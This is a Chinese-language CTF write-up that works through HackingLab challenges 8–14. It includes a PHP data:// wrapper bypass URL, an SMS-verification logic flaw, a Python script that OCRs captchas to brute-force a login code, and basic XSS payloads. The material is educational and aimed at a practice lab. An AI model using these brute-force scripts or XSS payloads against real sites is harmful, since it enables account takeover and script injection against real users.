8.微笑一下就能过关了
查看源代码,看到
<a href="?view-source">源代码
直接点不开,于是在url后面加上,即可得到
不知道怎么写。后来在发现这是ISG2014的一道题目的衍生,那题的WP:http://www.secpulse.com/archives/1112.html
看php源码的时候看到提交笑脸就可以了
if ($smile === "(●'◡'●)") die($flag);
不过实际测试的时候发现提交笑脸无效,所以我们用urlencode笑脸,这样浏览器就帮我们自动解析了,笑脸的urlencode就是%28%E2%97%8F%27%E2%97%A1%27%E2%97%8F%29
data://text/plain表示数据是无格式正文,源代码指定用charset:utf-8,不过测试的时候发现这样不行,由于utf-8从属于unicode,所以我们用charset:unicode
最后构造出如下url,即可
http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/?^.^=data://text/plain;charset=unicode,%28%E2%97%8F%27%E2%97%A1%27%E2%97%8F%29
9.逗比的手机验证码
最开始直接输入验证码提示手机手机号错误,应该是….7,在登陆界面改了手机号重新输入之后,又提示验证码发到别人手机上了
所以我们先用….6的手机号接收验证码,得到验证码后再将手机号改为…7,登陆得到key
10.基情燃烧的岁月
burp爆破验证码,得到
在网页中输入
于是把手机号换了,再爆破一次
11.验证码识别
用python的时候注意需要安装PIL,pytesser等,详细的python进行验证码识别的过程可以看我另外一篇博文
这里附上python3写的
import pytesseract
from PIL import Image
import requests
import os
cur_path = os.getcwd()
vcode_path = os.path.join(cur_path, 'vcode.png')
header = {'Cookie': 'PHPSESSID=$Your Value'}
def vcode():
# 验证码识别函数
pic_url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
r = requests.get(pic_url, headers=header, timeout=10)
with open(vcode_path, 'wb') as pic:
pic.write(r.content)
im = pytesseract.image_to_string(Image.open(vcode_path))
im = im.replace(' ', '')
if im != '':
return im
else:
return vcode()
url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php'
for i in range(100, 1000):
code = vcode()
data = {'username': '13388886666', 'mobi_code': str(i), 'user_code': code}
r = requests.post(url, data=data, headers=header, timeout=10)
response = r.content.decode('utf-8')
if 'user_code or mobi_code error' in response:
print('trying ' + str(i))
else:
print('the mobi_code is ' + str(i))
print(response)
break
12.XSS基础关
查看源码,发现
please use alert(Hackinglab)
所以我们构造语句
<script>alert(HackingLab)</script>
填入框中就行了
13.XSS基础2:简单绕过
看起来好像和上一次差不多,用上一次的方法做的时候发现被检测到了
构造个别的类似的语句试试
<img src=# onerror=alert(HackingLab) />
14.XSS基础3:检测与构造
和前两题还是差不多,还是不能用同样的语句,代码里也看不出什么地方不同,碰运气慢慢构造吧
alert' onmouseover=alert(HackingLab)>